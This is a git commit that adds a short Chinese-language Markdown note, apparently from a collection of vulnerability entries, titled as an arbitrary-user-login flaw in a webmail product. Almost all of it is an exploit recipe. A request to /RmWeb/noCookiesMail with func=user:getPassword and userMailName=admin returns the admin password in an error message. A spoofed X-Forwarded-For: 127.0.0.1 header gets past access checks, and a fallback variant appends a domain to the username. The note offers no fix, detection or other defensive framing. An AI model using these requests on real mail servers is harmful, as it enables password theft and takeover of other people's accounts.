Create WEBMAIL存在任意用户登录漏洞.md

2025-02-27 04:39:25 +00:00 · 2023-08-21 21:14:00 +08:00 · 2023-08-21 21:14:00 +08:00 · 1637ac33fb
commit 1637ac33fb
parent a076dda9f5
1 changed files with 11 additions and 0 deletions
--- a/WEBMAIL存在任意用户登录漏洞.md
+++ b/WEBMAIL存在任意用户登录漏洞.md
@ -0,0 +1,11 @@
+## WEBMAIL存在任意用户登录漏洞
+
+```
+RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
+回显errormsg为密码
+用户名为 admin
+添加头 X-Forwarded-For: 127.0.0.1
+
+如果有登录失败的话，使用
+/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 登录
+```